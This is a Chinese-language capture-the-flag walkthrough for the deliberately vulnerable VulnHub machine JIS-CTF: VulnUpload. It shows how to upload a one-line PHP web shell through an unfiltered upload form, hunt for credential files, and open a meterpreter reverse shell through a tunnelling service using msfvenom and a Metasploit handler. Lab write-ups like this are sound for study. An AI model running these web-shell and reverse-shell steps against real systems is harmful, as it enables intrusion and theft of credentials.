JIS-CTF: VULNUPLOAD
- Name: JIS-CTF: VulnUpload
- Date release: 8 Mar 2018
- Author: Mohammad Khreesha
- Series: JIS-CTF
- JIS-CTF: VulnUpload ~ VulnHub
说明:我的环境是搭建在公网上的,如果是搭建在自己虚拟机的话实际操作并没有下面我写的那么复杂。
一、Flag_1
1.起初以为是sql注入,后来发现不是,没办法,拿御剑扫一波,竟然有意外收获
访问 http://xxx.xxx.xx.xxx:8889/flag 即可得到flag_1
二、Flag_2
1.在http://xxx.xxx.xxx.xxx:8889/robots.txt 中发现还有其他页面,其中只有 http://xxx.xxx.xxx.xxx:8889/admin_area/ 有东西
2.查看网页源代码得到flag_2,同时得到登录账号username:admin password:3v1l_H@ck3r
三、Flag_3
1.登录进来发现是文件上传,这里上传一句话木马即可,没有任何的过滤
2.从之前的robots.txt中可以推出上传路径为 http://xxx.xxx.xxx.xxx:8889/uploaded_files/ ,使用蚁剑连接即可
3.在终端模糊查询flag,找到flag.txt
4.但是flag.txt访问之后并没有回显出东西,但是在同目录下的 hint.txt中找到了flag_3
四、Flag_4
1. 这里提示查找 technawi 用户来读取flag.txt
使用如下命令查找有关 techhnawi 用户的文件:
find / -user 'technawi' 2>/dev/null
在/etc/mysql/conf.d/credentials.txt 文件中找到flag_4
五、Flag_5
1.这里提供了technawi 的密码,根据之前的提示,很显然我们需要登录 technawi 这个用户,此时蚁剑已经不能满足需求了,我们直接上kali。
因为环境是搭建在公网上的,我们kali机在内网,所以需要进行内网穿透,首先在ngrok上搭建一个ftp服务,如下:
Ngrok官网:https://www.ngrok.cc/
2.打开服务
./sunny clientid 隧道id
3.生成一个webhell,种类很多,这里选择php,生成之后把这个shell上传
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=80 -f raw > qwer.php
注:生成的webshell在当前目录下
4.对qwer.php修改ip和端口(ip和端口是Ngrok提供的ip和端口)
ip: free.idcfengye.com
端口: xxxx
5.打开msf,输入以下payload,
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 80
run
6.访问我们上传的shell:http://xxx.xxx.xxx.xxx:8889/uploaded_files/qwer.php,然后run
输入以下命令:
shell
python -c "import pty;pty.spawn('/bin/bash')"
7.这时候我们就可以登录 technawi 了
Linux切换用户命令:su 用户名
8.进入/var/www/html 读取flag.txt即可得到flag_5
参考文章: